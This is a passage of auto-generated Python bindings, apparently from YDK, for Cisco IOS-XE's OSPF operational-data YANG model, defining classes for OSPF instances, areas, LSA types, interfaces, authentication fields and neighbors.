OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value) class Ospfv2Instance(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance, self).__init__() self.yang_name = "ospfv2-instance" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['instance_id'] self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))]) self._leafs = OrderedDict([ ('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])), ('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ]) self.instance_id = None self.vrf_name = None self.router_id = None self.ospfv2_area = YList(self) self.ospfv2_lsdb_external = YList(self) self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value) class Ospfv2Area(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__() self.yang_name = "ospfv2-area" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospfv2_lsdb_area = YList(self) self.ospfv2_interface = YList(self) self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value) class Ospfv2LsdbArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__() self.yang_name = "ospfv2-lsdb-area" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class Ospfv2Interface(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__() self.yang_name = "ospfv2-interface" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])), ]) self.name = None self.network_type = None self.enable = None self.passive = None self.demand_circuit = None self.mtu_ignore = None self.prefix_suppresion = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.state = None self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal() self.ttl_security_val.parent = self self._children_name_map["ttl_security_val"] = "ttl-security-val" self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal() self.auth_val.parent = self self._children_name_map["auth_val"] = "auth-val" self.ospfv2_neighbor = YList(self) self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value) class TtlSecurityVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__() self.yang_name = "ttl-security-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('hops', (YLeaf(YType.int32, 'hops'), ['int'])), ]) self.enable = None self.hops = None self._segment_path = lambda: "ttl-security-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value) class AuthVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__() self.yang_name = "auth-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))]) self._leafs = OrderedDict([ ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.no_auth = None self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey() self.auth_key.parent = self self._children_name_map["auth_key"] = "auth-key" self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain() self.key_chain.parent = self self._children_name_map["key_chain"] = "key-chain" self._segment_path = lambda: "auth-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value) class AuthKey(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__() self.yang_name = "auth-key" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])), ('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])), ('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])), ]) self.key_id = None self.key_string = [] self.crypto_algo = None self._segment_path = lambda: "auth-key" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value) class KeyChain(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__() self.yang_name = "key-chain" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])), ]) self.key_chain = [] self._segment_path = lambda: "key-chain" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value) class Ospfv2Neighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__() self.yang_name = "ospfv2-neighbor" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['nbr_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])), ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])), ('state', (YLeaf(YType.enumeration, 'state'), 